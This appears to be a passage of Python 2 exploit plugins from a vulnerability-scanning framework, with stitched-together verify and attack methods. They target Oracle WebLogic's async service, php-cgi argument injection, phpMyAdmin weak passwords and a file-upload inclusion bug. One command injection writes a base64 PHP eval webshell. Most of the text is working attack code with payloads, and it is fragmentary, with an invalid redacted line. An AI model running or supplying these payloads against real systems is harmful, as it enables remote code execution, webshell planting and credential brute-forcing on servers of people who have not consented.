    bea_wls_internal/ when the target is vulnerable; nothing removes it.

    Returns:
        self.parse_output(result); 'VerifyInfo' is set when the flag is
        read back.
    """
    result = {}
    filename = "/_async/AsyncResponseService"
    url = self.url.strip('/') + filename
    print(url)
    headers = {'content-type': 'text/xml'}
    flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
    flag = flag.lower()
    # The template takes the flag three times (file name and content).
    data = self.payload1.format(flag, flag, flag)
    print(data)
    r = req.post(url, data=data, headers=headers, timeout=7)
    if r.status_code == 202:
        flag_url = self.url.strip('/') + '/bea_wls_internal/{0}.jsp?pwd=s{1}'.format(flag, flag)
        print(flag_url)
        r2 = req.get(flag_url)
        if flag in r2.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = self.url.strip('/') + filename
    return self.parse_output(result)
def _attack(self):
    """Attack mode for a CTF-style flag check: sends two array parameters
    (var1[0]=1, var2[0]=2) by GET and by POST and greps the response for
    `<name>{...}`.

    Reads self.params['var1'], ['var2'] and ['name'].

    NOTE(review): the `if not self.params["var2"]` branch assigns "var1",
    not "var2", so an empty var2 stays empty. The same `payload` string is
    passed as `params=` to both req.get and req.post, so the POST also
    carries it in the query string, not the body.

    Returns:
        self.parse_attack(result); 'FlagInfo' holds GetFlag and/or PostFlag.
    """
    result = {}
    vulurl = self.url
    # TODO;
    if not self.params["var1"]:
        self.params["var1"] = "a"
    if not self.params["var2"]:
        self.params["var1"] = "b"
    payload = self.params["var1"] + "[0]=1&" + self.params["var2"] + "[0]=2"
    print payload
    resp = req.get(vulurl, params=payload)
    match_result = re.search(self.params['name'] + '{(.*)}', resp.content)
    if match_result:
        result['FlagInfo'] = {}
        result['FlagInfo']['GetFlag'] = self.params['name'] + "{" + match_result.group(1) + "}"
    resp = req.post(vulurl, params=payload)
    match_result = re.search(self.params['name'] + '{(.*)}', resp.content)
    if match_result:
        # Reinitialising here drops a GetFlag set by the GET branch above.
        result['FlagInfo'] = {}
        result['FlagInfo']['PostFlag'] = self.params['name'] + "{" + match_result.group(1) + "}"
    return self.parse_attack(result)
def _verify(self):
    """Verify mode for php-cgi query-string argument injection
    (-d allow_url_include / auto_prepend_file=php://input).

    Posts a PHP snippet that echoes a random 8-letter flag and checks for
    the flag in the response.

    NOTE(review): self.url is rewritten in place to include the injected
    query string, so later calls on the same instance see the modified URL.

    Returns:
        self.parse_output(result); 'VerifyInfo' is set when the flag echoes.
    """
    result = {}
    header = {
        'Accept': '*/*',
        'Accept-Language': 'en',
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    payload = '/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input'
    flag = "".join(random.choice(random.choice is None or string.ascii_letters) for _ in xrange(0, 8)) if False else "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
    data = '<?php echo "' + flag + '"; ?>'
    self.url = self.url.strip('/') + payload
    resp = req.post(self.url, headers=header, data=data)
    # The sleep runs after the response has been received.
    time.sleep(2)
    if flag in resp.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
    return self.parse_output(result)
def _attack(self):
    """Attack mode for the WebLogic /_async/AsyncResponseService issue.

    Posts self.payload2 (defined elsewhere on the class) filled with a
    random flag, then asks self.verify_result(flag, cmd) (also defined
    elsewhere) for the `whoami` output and a shell URL.

    Side effect on the target: whatever payload2 writes is left in place;
    the template content itself is not visible here.

    Returns:
        self.parse_output(result); 'extra', 'VerifyInfo' and 'ShellInfo'
        are set when verify_result() returns a truthy list.
    """
    result = {}
    filename = "/_async/AsyncResponseService"
    url = self.url.strip('/') + filename
    cmd = 'whoami'
    headers = {'content-type': 'text/xml'}
    # --ping `whoami`.weblogic.xxxxxx.ceye.io--  (author's note; the
    # out-of-band lookup is not performed by the visible code)
    flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
    flag = flag.lower()
    data = self.payload2.format(flag)
    r1 = req.post(url, data=data, headers=headers, timeout=7)
    if r1.status_code == 202:
        # Assumed shape: datalist[0] is the whoami output, datalist[1] the
        # shell URL — verify_result is not visible here.
        datalist = self.verify_result(flag, cmd)
        if datalist:
            result['extra'] = {}
            result['extra']['whoami'] = datalist[0]
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = self.url.strip('/') + filename
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = datalist[1]
            result['ShellInfo']['Content'] = data
    return self.parse_output(result)
def _verify(self):
    """Verify mode: phpMyAdmin weak-credential check.

    Locates the login page (root or /phpmyadmin/), then tries every
    user/password pair from the two lists and looks for logged-in page
    markers in the response. Each pair is a separate login request against
    the target.

    NOTE(review): the payload_data line is redacted ('******') in this copy
    and is not valid Python as shown. target_url is only bound inside the
    try block, so when neither page matches the later POST raises
    NameError, which the inner `except Exception` swallows silently.

    Returns:
        self.parse_output(result); 'VerifyInfo' holds the last matching
        pair (the loop does not stop on success).
    """
    result = {}
    # Substrings that only appear on the post-login page
    flag_list = [
        'src="navigation.php',
        'frameborder="0" id="frame_content"',
        'id="li_server_type">',
        'class="disableAjax" title='
    ]
    user_list = ['root', 'admin']
    password_list = [
        'root', '123456', '12345678', 'password', 'passwd', '123', 'admin', 'admin123'
    ]
    try:
        response = req.get(self.url)
        if 'name=\"phpMyAdmin\"' in response.content:
            target_url = str(self.url) + "/index.php"
        else:
            response = req.get(self.url + '/phpmyadmin/index.php')
            if 'input_password' in response.content and 'name="token"' in response.content:
                target_url = self.url + "/phpmyadmin/index.php"
    except Exception as e:
        pass
    for user in user_list:
        for password in password_list:
            payload_data = "pma_username="******"&pma_password="******"" \
                           "&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci"
            try:
                respond = req.post(target_url, data=payload_data)
                for flag in flag_list:
                    if flag in respond.content:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = target_url
                        result['VerifyInfo']['Payload'] = payload_data
            except Exception as e:
                pass
    return self.parse_output(result)
def _attack(self): result = {} #need Cookie and username and uid if not 'Cookie' in self.headers: raise Exception('Cookie required') if not 'username' in self.params: raise Exception('uid required') img_url = self.upload_image() payload = '300x300||echo%20PD9waHAgZXZhbCgkX1BPU1RbZV0pOz8%2b|base64%20-d%20%3E%20Uan1wS.php%20%23' sess = req.Session() sess.headers.update(self.headers) sess.get(img_url.replace('300x300', payload)) #get shell resp = req.post('%s/Uan1wS.php' % self.url, data={'e': 'echo strrev(dfgniqsfc);'}).content if 'cfsqingfd' in resp: result['ShellInfo'] = {} result['ShellInfo']['URL'] = '%s/Uan1wS.php' % self.url result['ShellInfo']['Content'] = 'e' return self.parse_attack(result)
def _verify(self):
    """Verify mode: upload a self-deleting PHP probe as an image, then
    include it via the `d` parameter with a trailing %00.

    Side effect on the target: a file is written under uploadfiles/; the
    probe calls unlink(__FILE__) when it runs, so it removes itself only on
    a vulnerable host.

    Returns:
        self.parse_attack(result) when check_argv() passes; otherwise
        None (falls off the end).
    """
    if self.check_argv():
        result = {}
        # Set the Content-Type header for a multipart upload (fixed boundary)
        self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
        # File name testjpg.jpg, body <?php echo md5(0x2333333);unlink(__FILE__); ?>
        post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5(0x2333333);unlink(__FILE__); ?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
        # Upload endpoint; this is the application's regular upload feature.
        # NOTE(review): self.headers is mutated but not passed to req.post,
        # so whether the Content-Type is sent depends on how `req` is set up.
        post_url = urlparse.urljoin(self.url, 'index.php?ac=common_upfile&type=')
        resp = req.post(url=post_url, data=post_data)
        # Extract the stored filename from the response
        if resp.status_code == 200:
            match_result = re.search(r'value =\'(.*?)\'', resp.content, re.I | re.M)
            if match_result:
                # Request the local-file-inclusion URL
                payload = "../../uploadfiles/" + match_result.group(1) + "%00"
                vul_url = urlparse.urljoin(self.url, "index.php?d=" + payload)
                resp = req.get(vul_url)
                # 5a8adb32edd60e0cfb459cfb38093755 is the expected md5(0x2333333) output
                if resp.status_code == 200 and '5a8adb32edd60e0cfb459cfb38093755' in resp.content:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_url
        return self.parse_attack(result)